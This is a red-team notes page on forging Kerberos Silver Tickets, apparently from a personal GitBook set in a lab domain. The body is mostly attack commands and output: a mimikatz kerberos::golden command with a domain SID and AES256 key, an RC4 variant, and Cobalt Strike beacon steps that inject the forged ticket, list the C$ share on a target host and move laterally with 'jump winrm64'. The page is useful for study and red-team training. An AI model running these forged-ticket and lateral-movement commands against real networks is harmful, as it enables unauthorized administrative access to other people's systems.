🐧
Hassan Saad
  • WHO AM I ?
  • Red Teaming
    • C2 Infrastructure
    • External Reconnaissance
    • Initial Compromise
      • Executable File (EXE)
      • HTML Application (HTA)
      • Visual Basic (VBA Macros)
      • Password Spraying
      • MITM Attack
      • Email Spoofing
    • Host Reconnaissance
      • Seatbelt
      • Screenshots & Keylogging
    • Host Persistence
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM Hijacking
    • Host Privilege Escalation
      • Automated Tools
      • Unquoted Service Path
      • Weak Service Permission
      • Weak Service Binary
      • Always Install Elevated
      • UAC Bypass
    • Domain Reconnaissance
      • PowerView
      • BloodHound
      • Linux Host
      • Internal Applications
    • Lateral Movement
      • PowerShell Remoting
      • PsExec
      • WMI
      • DCOM
    • Credentials Access
      • LogonPasswords
      • Security Account Manager (SAM)
      • Domain Cached Creds
      • Kerberos Tickets
      • DPAPI
      • User Impersonation
      • Pass The Hash
      • Over Pass The Hash
      • Internal Password Spraying
      • Sniffing
      • NTLM Relay
    • Pivoting & Forwarding
      • SOCKS Proxy
      • Reverse Port Forwards
      • Local Port Forwards
      • Session Passing
      • P2P Listeners
      • NTLM Relay
    • Kerberos
      • Authentication
      • Kerberoasting
      • ASREP-Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Linux Credential Cache
    • Group Policy
      • Enumeration
      • RSAT (GPMC)
      • Sharp GPO Abuse
    • Access Control Lists (DACL)
      • GenericAll
      • WriteDacl
      • WriteOwner
    • MS SQL Servers
      • Enumeration
      • NetNTLM Capture
      • Command Execution
      • Lateral Movement
      • Privilege Escalation
    • Domain Dominance
      • DCSync Backdoor
      • AdminSDHolder
      • Remote Registry Backdoor
      • Skeleton Key
      • Silver Ticket
      • Golden Ticket
    • Forest & Domain Trusts
      • Parent/Child
      • One Way (Inbound)
      • One Way (Outbound)
    • Evasion Techniques
      • Obfuscation
      • Process Injection
      • LAPS
      • AppLocker
      • PowerShell Constrained Mode
      • AMSI
      • Antivirus Exclusion
  • Penetration Testing
    • Information Gathering
    • Scanning
    • Exploitation
    • Post Exploitation
    • Password Attacks
    • Web Attacks
    • Exploit Development
  • Technology Essentials
    • Linux
      • Basics
      • Tasks
    • Windows
      • Basics
      • Tasks
    • Network
      • Basics
      • Tasks
    • Programming
      • Basics
      • Tasks
  • Bug Hunting
    • XSS on Nokia
    • XSS on Wuzzuf
    • Business Logic Flaw on Souq (Amazon Company)
    • Rate Limit Bypass on LinkedIn
    • Sensitive Data Exposure on Google
  • Tools
    • Recon Hunter
    • Mail Hunter
    • Mobile Hunter
    • Chimera (Threat Hunter)
  • Extras
    • SQL Injection
    • Web Basics
    • Mobile Testing
      • Mobile Testing 1
      • Mobile Testing 2
      • Mobile Testing 3
Powered by GitBook
On this page
  1. Red Teaming
  2. Domain Dominance

Silver Ticket

PreviousSkeleton KeyNextGolden Ticket

Last updated 2 years ago

mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /target:srv-2 /service:cifs /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /ticket:srv2-cifs.kirbi

# OR
kerberos::golden /user:<> /domain:<> /sid:<> /target:<> /service:<> /rc4:<> /ticket:silver.kirbi /ptt

Where:

  • /user is the username to impersonate. (any user)

  • /domain is the current FQDN domain name.

  • /sid is the current domain SID.

  • /target is the FQDN target machine.

  • /service is the target service

  • /rc4 is the NTLM hash of the computer account

  • /aes256 is the AES256 key for the target machine.

  • /ticket is the filename to save the ticket as.

beacon> make_token DEV\Administrator FakePass
[+] Impersonated DEV\bfarmer

beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\srv2-cifs.kirbi
beacon> ls \\srv-2\c$

beacon> rev2self

Technique

Required Service Tickets

psexec

CIFS

winrm

HOST & HTTP

dcsync (DCs only)

LDAP

beacon> run klist

Current LogonId is 0:0x2d3d7

Cached Tickets: (2)

#0>    Client: Administrator @ dev.cyberbotic.io
    Server: host/srv-2 @ dev.cyberbotic.io
    KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
    Ticket Flags 0x40a00000 -> forwardable renewable pre_authent 
    Start Time: 5/26/2021 17:04:19 (local)
    End Time:   5/24/2031 17:04:19 (local)
    Renew Time: 5/24/2031 17:04:19 (local)
    Session Key Type: AES-256-CTS-HMAC-SHA1-96
    Cache Flags: 0 
    Kdc Called: 

#1>    Client: Administrator @ dev.cyberbotic.io
    Server: http/srv-2 @ dev.cyberbotic.io
    KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
    Ticket Flags 0x40a00000 -> forwardable renewable pre_authent 
    Start Time: 5/26/2021 17:06:34 (local)
    End Time:   5/24/2031 17:06:34 (local)
    Renew Time: 5/24/2031 17:06:34 (local)
    Session Key Type: AES-256-CTS-HMAC-SHA1-96
    Cache Flags: 0 
    Kdc Called: 

beacon> jump winrm64 srv-2 smb
[+] established link to child beacon: 10.10.17.68

Note: we can use the target machine hash as the service hash for the filesharing service (CIFS).